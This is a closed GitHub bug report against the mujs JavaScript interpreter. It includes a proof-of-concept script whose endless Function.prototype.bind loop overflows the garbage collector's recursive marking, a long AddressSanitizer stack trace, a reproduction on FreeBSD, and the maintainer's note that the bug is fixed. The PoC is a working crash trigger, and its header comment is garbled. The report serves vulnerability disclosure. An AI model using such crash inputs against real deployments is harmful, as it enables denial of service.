
stack overflow #134

Closed
rain6851 opened this issue Apr 17, 2020 · 3 comments

Comments

@rain6851

Environment

operating system: ubuntu18.04
compile command:  make build=sanitize

test command: ./mujs  poc 

poc

/*
 est bound function chainnal implementation
 *  to "collapse" bound funct
/*===
F() bound foo
object this-F
string foo
undefined undefined
undefined undefined
undefined undefined
G() bound bound foo
object this-F
string foo
string bar
string quux
unarg-52
53 string arg-53
54 string arg-54
55 string arg-55
56 string arg-56
57 string arg-57
58 string arg-58
59 string arg-59
60 string arg-60
61 string arg-61
62 string arg-62
63 string arg-63
64 string arg-64
65 string arg-65
66 string arg-66
67 string arg-67
68 string arg-68
69 string arg-69
70 string arg-70
71 string arg-71
72 string arg-72
73 string arg-73
74 string arg-74
75 string arg-75
76 string arg-76
77 string arg-77
78 string arg-78
79 string arg-79
80 string arg-80
81 string arg-81
82 string arg-82
83 string arg-83
84 string arg-84
85 string arg-85
86 string arg-86
87 string arg-87
88 string arg-88
89 string arg-89
90 string arg-90
91 string arg-91
92 string arg-92
93 string arg-93
94 string arg-94
95 string arg-95
96 string arg-96
97 string arg-97
98 string arg-98
99 string arg-99
===*/

// Exercises chains of bound functions (Function.prototype.bind applied to an
// already-bound function) in three sections: an ECMAScript target, a native
// target (Math.max), and a "long chain" built in a loop. Output goes through
// print(), which this listing does not define; it is expected to come from
// the host shell.
function test() {
    var func;
    var F, G, H, I;

    // Final function is an ECMAScript function.

    // Target prints its `this` binding and its first four arguments.
    func = function foo(a, b, c, d) {
        print(typeof this, this);
        print(typeof a, a);
        print(typeof b, b);
        print(typeof c, c);
        print(typeof d, d);
    };
    F = func.bind('this-F', 'foo');
    G = F.bind('this-G', 'bar', 'quux');
    H = G.bind('this-H', 'baz', 'quuux');
    I = G.bind('this-I', 123, 234);  // both H and I bind via G

    print('F()', F.name);
    F();
    print('G()', G.name);
    G();
    print('H()', H.name);
    H();
    print('I()', I.name);
    I();

    // Final function is a native function.

    // Here the chain is linear: each level binds the previous one and adds
    // one more argument for Math.max.
    func = Math.max;
    F = func.bind(null);
    G = F.bind(null, 3);
    H = G.bind(null, 4);
    I = H.bind(null, 5);

    print('F()', F.name);
    print(F());
    print('G()', G.name);
    print(G());
    print('H()', H.name);
    print(H());
    print('I()', I.name);
    print(I());

    // Lightfunc final target needs testing too; it is covered by Math.max()
    // if DUK_USE_LIGHTFUNC_BUILTINS is enabled.

    // Long chain.

    // Target prints its `this` binding, the argument count, and each argument.
    func = function foo() {
        print(typeof this, this);
        print(arguments.length);
        for (var i = 0; i < arguments.length; i++) {
            print(i, typeof arguments[i], arguments[i]);
        }
    };

    // NOTE(review): `!i < 100` compares a boolean (coerced to 0 or 1) with 100,
    // so the condition is always true and the loop has no exit. Every pass
    // wraps `func` in one more bound function, so the chain depth grows
    // without limit and the two statements after the loop are not reached by
    // normal control flow. Presumably this ever-deepening object chain is
    // what the jsG_markobject / jsG_markproperty recursion in the report's
    // ASan trace is walking; confirm against jsgc.c.
    for (var i = 0;!i < 100; i++) {
        func = func.bind('this-' + i, 'arg-' + i);
    }
    print(func.name);
    func();
}

// Script entry point: run test() once. The catch block is empty, so any
// JavaScript exception thrown by test() is discarded without output.
try {
    test();
} catch (e) {
}

vulnerability description:

The PoC causes a stack overflow, as shown below. The trace consists of repeating jsG_markproperty and jsG_markobject frames in jsgc.c:

ASAN:SIGSEGV
=================================================================
==19628==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd0fa89ff8 (pc 0x00000041ecf2 bp 0x7ffd0fa8a010 sp 0x7ffd0fa89ff0 T0)
    #0 0x41ecf1 in jsG_markproperty /home/node/xmujs/jsgc.c:76
    #1 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #2 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #3 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #4 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #5 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #6 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #7 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #8 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #9 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #10 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #11 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #12 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #13 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #14 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #15 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #16 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #17 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #18 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #19 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #20 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #21 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #22 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #23 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #24 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #25 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #26 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #27 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #28 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #29 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #30 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #31 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #32 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #33 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #34 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #35 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #36 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #37 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #38 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #39 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #40 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #41 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #42 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #43 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #44 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #45 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #46 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #47 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #48 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #49 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #50 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #51 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #52 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #53 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #54 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #55 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #56 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #57 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #58 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #59 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #60 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #61 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #62 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #63 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #64 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #65 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #66 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #67 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #68 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #69 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #70 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #71 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #72 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #73 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #74 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #75 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #76 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #77 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #78 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #79 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #80 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #81 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #82 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #83 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #84 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #85 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #86 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #87 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #88 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #89 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #90 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #91 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #92 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #93 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #94 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #95 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #96 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #97 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #98 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #99 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #100 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #101 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #102 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #103 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #104 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #105 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #106 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #107 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #108 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #109 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #110 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #111 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #112 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #113 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #114 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #115 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #116 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #117 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #118 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #119 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #120 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #121 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #122 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #123 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #124 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #125 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #126 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #127 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #128 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #129 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #130 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #131 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #132 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #133 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #134 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #135 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #136 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #137 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #138 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #139 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #140 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #141 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #142 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #143 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #144 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #145 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #146 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #147 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #148 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #149 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #150 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #151 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #152 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #153 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #154 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #155 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #156 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #157 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #158 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #159 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #160 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #161 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #162 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #163 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #164 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #165 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #166 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #167 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #168 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #169 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #170 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #171 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #172 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #173 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #174 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #175 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #176 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #177 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #178 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #179 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #180 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #181 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #182 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #183 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #184 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #185 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #186 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #187 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #188 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #189 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #190 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #191 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #192 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #193 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #194 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #195 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #196 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #197 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #198 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #199 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #200 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #201 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #202 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #203 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #204 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #205 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #206 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #207 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #208 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #209 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #210 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #211 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #212 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #213 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #214 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #215 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #216 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #217 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #218 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #219 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #220 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #221 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #222 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #223 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #224 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #225 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #226 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #227 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #228 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #229 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #230 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #231 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #232 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #233 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #234 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #235 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #236 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #237 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #238 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #239 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #240 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #241 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #242 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #243 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #244 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #245 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #246 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #247 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #248 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #249 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #250 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #251 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78

SUMMARY: AddressSanitizer: stack-overflow /home/node/xmujs/jsgc.c:76 jsG_markproperty
==19628==ABORTING
@rain6851
Author

rain6851 commented May 7, 2020

@ccxvii @sebras please check the issues.

@yurivict

Reproducible on FreeBSD:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==18375==ERROR: AddressSanitizer: stack-overflow on address 0x7fffdfffffe8 (pc 0x0000002f218a bp 0x7fffe0000150 sp 0x7fffdffffff0 T0)
    #0 0x2f2189 in jsG_markobject /usr/ports/lang/mujs/work/mujs-1.0.7/./jsgc.c:94:34

SUMMARY: AddressSanitizer: stack-overflow /usr/ports/lang/mujs/work/mujs-1.0.7/./jsgc.c:94:34 in jsG_markobject
==18375==ABORTING

@ccxvii
Owner

ccxvii commented May 27, 2020

Should be fixed with the same commit that fixed issue 133. Thanks for the report!

@ccxvii ccxvii closed this as completed May 27, 2020